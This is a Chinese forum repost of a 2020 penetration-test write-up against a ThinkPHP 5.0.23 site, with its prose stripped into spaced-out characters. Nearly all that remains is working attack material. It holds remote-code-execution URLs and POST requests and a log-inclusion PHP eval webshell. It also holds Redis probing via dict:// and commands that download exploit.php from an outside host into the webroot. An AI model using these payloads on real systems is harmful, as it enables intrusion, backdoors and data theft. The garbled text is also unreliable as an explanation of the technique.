搜索

[18196] 2020-11-11_一次艰难的TP渗透测试

文档创建者:s7ckTeam
浏览次数:2
最后更新:2025-01-18
2020-11-11_一次艰难的TP渗透测试 T P s e v c k   H A C K   2 0 2 0 - 1 1 - 1 1   w w w . a . c o m / a d m i n 访 w w w . a . c o m / a d m i n / p u b l i c e r / l o g i n T P 5 . 0 . 2 3 使 : i n d e x . p h p ? s = i n d e x / t h i n k a p p / i n v o k e f u n c t i o n & f u n c t i o n = c a l l _ u s e r _ f u n c _ a r r a y & v a r s [ 0 ] = p h p i n f o & v a r s [ 1 ] [ ] = 1 s = i n d e x / t h i n k a p p / i n v o k e f u n c t i o n & f u n c t i o n = c a l l _ u s e r _ f u n c _ a r r a y & v a r s [ 0 ] = s y s t e m & v a r s [ 1 ] [ ] = i d _ m e t h o d = _ _ c o n s t r u c t & f i l t e r [ ] = s y s t e m & m e t h o d = G E T & g e t [ ] = i d p a t h i n f o ,   p a y l o a d 使 i n d e x . p h p ? s = c a p t c h a   访 c h a n g e   m e t h o d , p o s t s y s t e m 5 0 0 v a r _ d u m p
P O S T   / ? s = c a p t c h a   H T T P / 1 . 1 H o s t :   v u l n h o s t C a c h e - C o n t r o l :   m a x - a g e = 0 U p g r a d e - I n s e c u r e - R e q u e s t s :   1 U s e r - A g e n t :   M o z i l l a / 5 . 0   ( M a c i n t o s h ;   I n t e l   M a c   O S   X   1 0 _ 1 4 _ 6 )   A p p l e W e b K i t / 5 3 7 . 3 6   ( K H T M L ,   l i k e   G e c k o )   C h r o m e / 8 0 . 0 . 3 9 8 7 . 1 4 9   S a f a r i / 5 3 7 . 3 6 A c c e p t :   t e x t / h t m l , a p p l i c a t i o n / x h t m l + x m l , a p p l i c a t i o n / x m l ; q = 0 . 9 , i m a g e / w e b p , i m a g e / a p n g , * / * ; q = 0 . 8 , a p p l i c a t i o n / s i g n e d - e x c h a n g e ; v = b 3 ; q = 0 . 9 A c c e p t - E n c o d i n g :   g z i p ,   d e f l a t e A c c e p t - L a n g u a g e :   z h - C N , z h ; q = 0 . 9 , e n ; q = 0 . 8 C o n n e c t i o n :   c l o s e C o n t e n t - T y p e :   a p p l i c a t i o n / x - w w w - f o r m - u r l e n c o d e d C o n t e n t - L e n g t h :   8 3 _ m e t h o d = _ _ c o n s t r u c t & m e t h o d = g e t & f i l t e r [ ] = v a r _ d u m p & s e r v e r [ R E Q U E S T _ M E T H O D ] = 1 & g e t [ ] = 2 p h p i n f o :
P O S T   / ? s = c a p t c h a   H T T P / 1 . 1 H o s t :   v u l n h o s t C a c h e - C o n t r o l :   m a x - a g e = 0 U p g r a d e - I n s e c u r e - R e q u e s t s :   1 U s e r - A g e n t :   M o z i l l a / 5 . 0   ( M a c i n t o s h ;   I n t e l   M a c   O S   X   1 0 _ 1 4 _ 6 )   A p p l e W e b K i t / 5 3 7 . 3 6   ( K H T M L ,   l i k e   G e c k o )   C h r o m e / 8 0 . 0 . 3 9 8 7 . 1 4 9   S a f a r i / 5 3 7 . 3 6 A c c e p t :   t e x t / h t m l , a p p l i c a t i o n / x h t m l + x m l , a p p l i c a t i o n / x m l ; q = 0 . 9 , i m a g e / w e b p , i m a g e / a p n g , * / * ; q = 0 . 8 , a p p l i c a t i o n / s i g n e d - e x c h a n g e ; v = b 3 ; q = 0 . 9 A c c e p t - E n c o d i n g :   g z i p ,   d e f l a t e A c c e p t - L a n g u a g e :   z h - C N , z h ; q = 0 . 9 , e n ; q = 0 . 8 C o n n e c t i o n :   c l o s e C o n t e n t - T y p e :   a p p l i c a t i o n / x - w w w - f o r m - u r l e n c o d e d C o n t e n t - L e n g t h :   8 3 _ m e t h o d = _ _ c o n s t r u c t & m e t h o d = g e t & f i l t e r [ ] = p h p i n f o & s e r v e r [ R E Q U E S T _ M E T H O D ] = 1 & g e t [ ] = 4 d i s a b l e _ f u n c t i o n s p a s s t h r u , e x e c , s y s t e m , p u t e n v , c h r o o t , c h g r p , c h o w n , s h e l l _ e x e c , p o p e n , p r o c _ o p e n , p c n t l _ e x e c , i n i _ a l t e r , i n i _ r e s t o r e , d l , o p e n l o g , s y s l o g , r e a d l i n k , s y m l i n k , p o p e p a s s t h r u , p c n t l _ a l a r m , p c n t l _ f o r k , p c n t l _ w a i t p i d , p c n t l _ w a i t , p c n t l _ w i f e x i t e d , p c n t l _ w i f s t o p p e d , p c n t l _ w i f s i g n a l e d , p c n t l _ w i f c o n t i n u e d , p c n t l _ w e x i t s t a t u s , p c n t l _ w t e r m s i g , p c n t l _ w s t o p s i g , p c n t l _ s i g n a l , p c n t l _ s i g n a l _ d i s p a t c h , p c n t l _ g e t _ l a s t _ e r r o r , p c n t l _ s t r e r r o r , p c n t l _ s i g p r o c m a s k , p c n t l _ s i g w a i t i n f o , p c n t l _ s i g t i m e d w a i t , p c n t l _ e x e c , p c n t l _ g e t p r i o r i t y , p c n t l _ s e t p r i o r i t y , i m a p _ o p e n , a p a c h e _ s e t e n v t h i n k p h p   5 . 0 . 2 3 / w w w / w w w r o o t / v u l h o s t / p u b l i c / i n d e x . p h p p h p   7 . 2 . 1 8 a s s e r t o p e n _ b a s e d i r   / w w w / w w w r o o t / v u l h o s t c n / : / t m p / : / p r o c / b y p a s s d i s a b l e _ f u n c t i o n s p a y l o a d . _ m e t h o d = _ _ c o n s t r u c t & m e t h o d = g e t & f i l t e r [ ] = t h i n k _ _ i n c l u d e _ f i l e & s e r v e r [ ] = - 1 & g e t [ ] = / t m p / s e s s _ a s d     _ m e t h o d = _ _ c o n s t r u c t & m e t h o d = g e t & f i l t e r [ ] = t h i n k S e s s i o n : : s e t & g e t [ ] = < ? p h p   x ? > s e s s i o n p h p i n f o :
s e s s i o n r e d i s r e d i s   g e t s h e l l _ m e t h o d = _ _ c o n s t r u c t & m e t h o d = g e t & f i l t e r [ ] = t h i n k _ _ i n c l u d e _ f i l e & s e r v e r [ R E Q U E S T _ M E T H O D ] = . . / d a t a / r u n t i m e / l o g / 2 0 2 0 0 4 / 0 4 . l o g & c = c u r l _ e x e c ( c u r l _ i n i t ( " d i c t : / / 1 2 7 . 0 . 0 . 1 : 6 3 7 9 / i n f o " ) ) ; r e a d f i l e i n d e x . p h p _ m e t h o d = _ _ c o n s t r u c t & m e t h o d = g e t & f i l t e r [ ] = r e a d f i l e & s e r v e r [ R E Q U E S T _ M E T H O D ] = / w w w / w w w r o o t / v u l h o s t / p u b l i c / i n d e x . p h p i n d e x . p h p l o g _ m e t h o d = _ _ c o n s t r u c t & m e t h o d = g e t & f i l t e r [ ] = r e a d f i l e & s e r v e r [ R E Q U E S T _ M E T H O D ] = / w w w / w w w r o o t / v u l h o s t c n / d a t a / r u n t i m e / l o g / 2 0 2 0 0 4 / 0 4 . l o g _ m e t h o d = _ _ c o n s t r u c t & m e t h o d = g e t & f i l t e r [ ] = c a l l _ u s e r _ f u n c & s e r v e r [ R E Q U E S T _ M E T H O D ] = < ? p h p   e v a l ( $ _ P O S T [ ' c ' ] ) ; ? > _ m e t h o d = _ _ c o n s t r u c t & m e t h o d = g e t & f i l t e r [ ] = t h i n k _ _ i n c l u d e _ f i l e & s e r v e r [ R E Q U E S T _ M E T H O D ] = . . / d a t a / r u n t i m e / l o g / 2 0 2 0 0 4 / 0 4 . l o g & c = p h p i n f o ( ) ;   h t t p s : / / x z . a l i y u n . c o m / t / 6 1 0 6 s h e l l :
f i l e _ p u t _ c o n t e n t s ( " / w w w / w w w r o o t / v u l n s t c n / d e b u g . p h p " , f i l e _ g e t _ c o n t e n t s ( " h t t p : / / s c a n . j a v a s e c . c n / x x x x x " ) ) _ m e t h o d = _ _ c o n s t r u c t & m e t h o d = g e t & f i l t e r [ ] = t h i n k _ _ i n c l u d e _ f i l e & s e r v e r [ R E Q U E S T _ M E T H O D ] = . . / d a t a / r u n t i m e / l o g / 2 0 2 0 0 4 / 0 4 . l o g & c = p r i n t _ r ( s c a n d i r ( " / w w w / w w w r o o t / v u l h o s t c n / p u b l i c / " ) ) ; b y p a s s   d i s a b l e _ f u n c t i o n s , h t t p s : / / g i t h u b . c o m / m m 0 r 1 / e x p l o i t s / b l o b / m a s t e r / p h p 7 - g c - b y p a s s _ m e t h o d = _ _ c o n s t r u c t & m e t h o d = g e t & f i l t e r [ ] = t h i n k _ _ i n c l u d e _ f i l e & s e r v e r [ R E Q U E S T _ M E T H O D ] = . . / d a t a / r u n t i m e / l o g / 2 0 2 0 0 4 / 0 4 . l o g & c = f i l e _ p u t _ c o n t e n t s ( " / w w w / w w w r o o t / v u l h o s t c n / p u b l i c / t h e m e s / a d m i n _ t h e m e s / 3 . p h p " , f i l e _ g e t _ c o n t e n t s ( " h t t p : / / v p s : 6 5 5 3 4 / e x p l o i t . p h p " ) ) ; f p m : f p m 使 t c p 使 u n i x s o c k e t $ s o c k   =   s t r e a m _ s o c k e t _ c l i e n t ( ' u n i x : / / / t m p / p h p - f c g i . s o c k ' , $ e r r n o , $ e r r s t r ) ; r e d i s   s h e l l s o   s e v c k : H A C K
回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

使用Markdown编辑器编辑 使用富文本编辑器编辑

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理